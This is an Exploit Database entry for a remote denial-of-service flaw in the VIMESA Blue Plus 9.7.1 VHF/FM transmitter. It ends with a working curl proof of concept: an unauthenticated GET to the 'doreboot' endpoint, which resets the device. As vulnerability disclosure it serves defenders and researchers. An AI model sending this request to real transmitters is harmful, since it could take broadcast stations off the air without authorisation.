VIMESA VHF/FM Transmitter Blue Plus 9.7.1 (doreboot) – Remote Denial Of Service

• Exploit Database
• 21 阅读

• 作者： LiquidWorm
  日期： 2024-02-13
• 类别：

  • dos
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/51793/

• VIMESA VHF/FM Transmitter Blue Plus 9.7.1 (doreboot) Remote Denial Of Service
  
  
  Vendor: Video Medios, S.A. (VIMESA)
  Product web page: https://www.vimesa.es
  Affected version: img:v9.7.1 Html:v2.4 RS485:v2.5
  
  Summary: The transmitter Blue Plus is designed with all
  the latest technologies, such as high efficiency using
  the latest generation LDMOS transistor and high efficiency
  power supplies. We used a modern interface and performance
  using a color display with touch screen, with easy management
  software and easy to use. The transmitter is equipped with
  all audio input including Audio IP for a complete audio
  interface. The VHF/FM transmitter 30-1000 is intended
  for the transmission of frequency modulated broadcasts
  in mono or stereo. It work with broadband characteristics
  in the VHF frequency range from 87.5-108 MHz and can be
  operated with any frequency in this range withoug alignment.
  The transmitter output power is variable between 10 and 110%
  of the nominal Power. It is available with different remote
  control ports. It can store up to six broadcast programs
  including program specific parameters such as frequency,
  RF output power, modulation type, RDS, AF level and deviation
  limiting. The transmitter is equipped with a LAN interface
  that permits the complete remote control of the transmitter
  operation via SNMP or Web Server.
  
  Desc: The device is suffering from a Denial of Service (DoS)
  vulnerability. An unauthenticated attacker can issue an 
  unauthorized HTTP GET request to the unprotected endpoint
  'doreboot' and restart the transmitter operations.
  
  Tested on: lighttpd/1.4.32
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2023-5798
  Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5798.php
  
  
  22.07.2023
  
  --
  
  
  $ curl -v "http://192.168.3.11:5007/doreboot"
  * Trying 192.168.3.11:5007...
  * Connected to 192.168.3.11 (192.168.3.11) port 5007 (#0)
  > GET /doreboot HTTP/1.1
  > Host: 192.168.3.11:5007
  > User-Agent: curl/8.0.1
  > Accept: */*
  >
  * Recv failure: Connection was reset
  * Closing connection 0
  curl: (56) Recv failure: Connection was reset